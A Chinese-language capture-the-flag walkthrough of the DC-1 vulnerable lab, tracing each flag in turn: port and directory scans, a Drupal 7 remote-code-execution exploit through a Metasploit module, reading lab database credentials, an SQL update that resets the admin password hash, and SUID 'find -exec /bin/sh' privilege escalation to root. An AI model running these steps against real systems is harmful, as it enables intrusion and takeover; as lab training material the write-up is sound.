靶機簡介
DC系列的靶機是一個專門構建的易受攻擊的實驗室,總共有九個!目的是獲得滲透測試領域的經驗。
它的設計初學者是一個挑戰,但是它的難易程度取決於您的技能和知識以及學習能力。
要成功完成此挑戰,您需要具備Linux技能,熟悉Linux命令列以及具有基本滲透測試工具的經驗,例如可以在Kali Linux或Parrot Security OS上找到的工具。
有多種獲得根的方法,但是,我包括了一些標誌,這些標誌包含了初學者的線索。
總共有五個Flag,但是最終目標是在root的主目錄中找到並讀取該標誌。您甚至不需要成為root使用者即可執行此操作,但是,您將需要root特權。
根據您的技能水平,您可能可以跳過查詢大多數這些標誌並直接獲得root資格。
學習到的知識
Drupal 7
CMS的RCE
(Metasploit)
Drupal 7
的 Mysql
寫入 SQL
新增後臺管理員賬號
find
命令 SUID
許可權提升
資訊蒐集
拿到靶機後先對它埠進行掃描:
nmap -A -p- -T4 192.168.1.142
![圖片](https://i.iter01.com/images/48c2ff0c8bb51f3705c2458491012f4a73aed4de62589ce5e0c33184b114c532.png)
掃描出來結果發現它開放了 22
(ssh)、80
(http)、111
(nfs共享)。
其中 http
的 web
使用的 CMS
是 Drupal 7
。我們先從 web
下手吧:
http://192.168.1.142
![圖片](https://i.iter01.com/images/79195245bad24511c44c9d4b9234b731038ef028b523cbd43539e607b6a0792b.png)
在 web
頁面上沒有啥東西,嘗試了一下弱口令無果,還是先對它進行掃描目錄檔案吧:
dirb http://192.168.1.142
![圖片](https://i.iter01.com/images/c61cb9899fc28f1509b6757b5ad8ccc694231dc0ba43c6a1bc30334cdcdbcdcc.png)
掃描出來後發現有 robots.txt
檔案,開啟後是這樣的:
![圖片](https://i.iter01.com/images/365bc3e0197e7dbbd4cad2ed9fbc98122781b94440a6e1cc6bb2fc219b4e5175.png)
我在翻了一些檔案沒有得到可利用的資訊,只是知道它的版本好像是 7.x
版本。隨後我搜尋了一下有關於這個 CMS 的漏洞,看看能不能撿個漏:
searchsploit Drupal
![圖片](https://i.iter01.com/images/ea5fa71290c002ffd2e7a28a804072bf8b9825e97b673b5b671a71530b030260.png)
從上圖可知,它漏洞還是蠻多的,剛好有一個 RCE
可以用 Metasploit
來進行利用!隨後我開啟 MSF 搜尋了一下它的利用模組,我使用的是這個模組(前面幾個看了不能用):
exploit/unix/webapp/drupal_drupalgeddon2
![圖片](https://i.iter01.com/images/a2bd59dfaa0c554360ed02dd0610c10d9b6e884c919884052f546c93c3a91ccc.png)
之後設定 rhosts
開始攻擊 exploit
得到一枚 shell
:
看了看只是一個普通的網站許可權,系統是 Linux
的 Debian
。
我先是用 MSF
的提權輔助模組來嘗試看看能不能運氣爆棚的雞蛋裡挑骨頭找到一個提權模組:
run post/multi/recon/local_exploit_suggester
![圖片](https://i.iter01.com/images/2ad8932f6a0e12b33aab20f3c260ed2d886135a8a8c301df4fbd88abf29114bd.png)
額,沒有找到可以用來提權的模組,那麼就算了~我還是先進它 shell
裡面看看吧,只有打入敵人內部才能取敵將首級!進入到 shell
後先用 python
來得到一枚 sh
吧:
python -c 'import pty;pty.spawn("/bin/sh")
![圖片](https://i.iter01.com/images/e5ae4a8987813e8f30ea284658f2a37230028f673e873469c797ff080da82db1.png)
Flag1
我所在的目錄是網站的絕對路徑 /var/www
,下面有一個 flag1.txt
檔案,cat
檢視檔案後拿到第一個 flag
,裡面有作者給我們的提示:
Every good CMS needs a config file - and so do you.
![圖片](https://i.iter01.com/images/51c6cb5c4695fe0ed7fcca876398907189d8d58773ccfd5517b3c792d05c3c02.png)
翻譯過來大概就是讓我們找 CMS
的配置檔案,這也是我們獲取下一個flag
的線索之一!
Flag2
得到線索後,我瘋狂翻網站的目錄找到了它的配置檔案:
/var/www/sites/default/settings.php
![圖片](https://i.iter01.com/images/f8a4cfec8bdeb2bfbd7c5608ebeaf3dae94bcae28f8eb237079350b7c430d50e.png)
檢視檔案後我們得到了Flag2
,又得到了一個新線索:
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
![圖片](https://i.iter01.com/images/1e9a7ddbcc6ad9fce9266568886646513c949bf02367f7e55a5b28d018341a09.png)
翻譯過來大概的意思是告訴我們暴力用字典破解不是一個有效的方式,既然得到了配置檔案,你能用這個配置檔案來做什麼?
Flag3
很明顯了,這段提示下面就是一個資料庫的配置資訊,作者可能是要讓我們進入到 Mysql
裡面!
資料庫名:'drupaldb',
使用者名稱:'dbuser',
密碼:'R0ck3t',
![圖片](https://i.iter01.com/images/5030c2ad61907c9841312a95183b0e88324a547f19d5848c3b39575a9391cfb8.png)
成功登陸到它的 Mysql 裡面,我找到了一些賬號和密碼:
![圖片](https://i.iter01.com/images/da621de24d939dd80a3983148cbf18f40e1309011ada68ac0fd0e1bb6fcaa312.png)
但是這玩意密碼有雜湊加密了的,我又連續查詢了好多表才發現了 Flag3
的一絲線索:
![圖片](https://i.iter01.com/images/34a72949ee357e1c66650bfd5d045d10c3daccfcaf239f1876efc30bfcc15935.png)
它這裡的 title
裡有 flag3
,但是裡面沒有提示資訊!既然是在 title
上有 flag3
的線索,那麼有可能是在網站的裡面,也就是網站的後臺裡!
接著我重新寫入了一段 SQL
語句,把管理員的密碼給重置了:
具體可以看這篇文章:https://www.isfirst.net/drupal/drupal-reset-password
update users set pass='$S$DFLfuzfO9WDKAJcUHnNmhS9NwOD6MRj3pk00qEl4O7iNBD2X4n3v' where name='admin';
# 這段 sql 語句的意思是把 admin 的密碼重置為 drupal ,因為它的 pass 加密是 password-hash.sh ,所以我們直接給他替換掉!
![圖片](https://i.iter01.com/images/9c947c82fe4a927d4b59d76849716da757260be128869bbe351fa9fb5ce1dab3.png)
寫入成功後,我們來到網站的登陸頁面:http://192.168.1.142/user
admin:drupal
![圖片](https://i.iter01.com/images/6665badc1d9a3e537d6d4bcd4c7253f385a8dded526112be9c1c4063415705ab.png)
登陸進去後我們得到了 Flag3!
這個時候我們又得到了一個新線索:
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
大概的意思是讓我們透過 -exec
命令來得到密碼啥的!
Flag4
既然提示說要我們透過命令來得到密碼,那麼我首先是檢視了 passwd
檔案,發現了有關 flag4
的線索:
![圖片](https://i.iter01.com/images/6211335294851448d1b6183f20e4021dfda2b8a026f341af9402b1a1acdcd005.png)
有一個 flag4
的使用者,隨後我來到了 flag4
的目錄發現了 flag4.txt
檔案!(saul檔案是我之前玩靶機留下的,大家當作沒有就好了)
開啟之後呢得到了最後一個線索:
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
![圖片](https://i.iter01.com/images/2c9f1ca3553818c2cad8294bc695c6dea0565373d994a721d445de6a33f3c597.png)
翻譯過來的意思大概是讓我們以相同的方式來得到 root
目錄下的 flag
。
Flag5
得到線索後我習慣性的 sudo -l
檢視有沒有什麼命令可以讓我提權的,但是它沒有 sudo
這個命令:
![圖片](https://i.iter01.com/images/64644aa3fca7733a8af50fc117981d156485215d97def7afa83374a95a503edc.png)
額,有點打腦殼!借用朝陽冬泳怪鴿
的話:我們遇到什麼困難也不要怕,微笑著面對它!消除恐懼的最好辦法就是面對恐懼!堅持,才是勝利。加油!奧利給!
別慌,抽根菸再好好想想!我又接著檢視下,看它有沒有 root
許可權的檔案,但是沒有:
find / -perm -4000 2>/dev/null
![圖片](https://i.iter01.com/images/f21601a5f737adf77d14a4e1ff1137fe379eb439df721c6b30ae02534d454ec8.png)
接著我又檢視了有沒有 root
許可權的 SUID
命令發現了這些:
find / -type f -perm -u=s 2>/dev/null
![圖片](https://i.iter01.com/images/18aa2c098fcd954fedefb244ff09a83e40ba860f57c9d3623e4e189b73ca0612.png)
其中有一個命令我之前提權的時候用過,就是 find
命令!剛好之前在拿到 Flag3
的時候它提示了 -exec
命令!這是一個引數,搭配 find
查詢命令使用可以呼叫命令來去執行!
我首先是想在 flag4
目錄建立個檔案,但是失敗了!但是沒關係!
![圖片](https://i.iter01.com/images/2081d1c5c85ba3ca1e8a99d91bf27d45cdb35c76b3d16b7e2ca52e35eae68d86.png)
由於當前目錄下有一個 flag4.txt
檔案我們就直接使用 find
檢視當前許可權,請忽略上面那條命令!(當時的思路是建立一個檔案,然後使用 find 命令來查詢這個檔案然後執行命令的)
find flag4.txt -exec "whoami" \;
![圖片](https://i.iter01.com/images/9d2e5de9ae5f54fed0a3cad1489f9abb519e9878ad6e2e6d4111026420fcf9ca.png)
可以看到,我們的許可權是 root
了,我們直接提權把:
find flag4.txt -exec "/bin/sh" \;
# 這段命令的意思就是先使用 find 命令查詢 flag4.txt 檔案,然後使用它的引數 -exec 來執行命令 /bin/sh ,這樣我們就能獲取到 root 許可權了!
![圖片](https://i.iter01.com/images/70af1333f691e0ff961e49b920c2249841b87b76e7193d7e56dde725e6907dde.png)
最後也是在 root
目錄下拿到了最後的 Flag
檔案!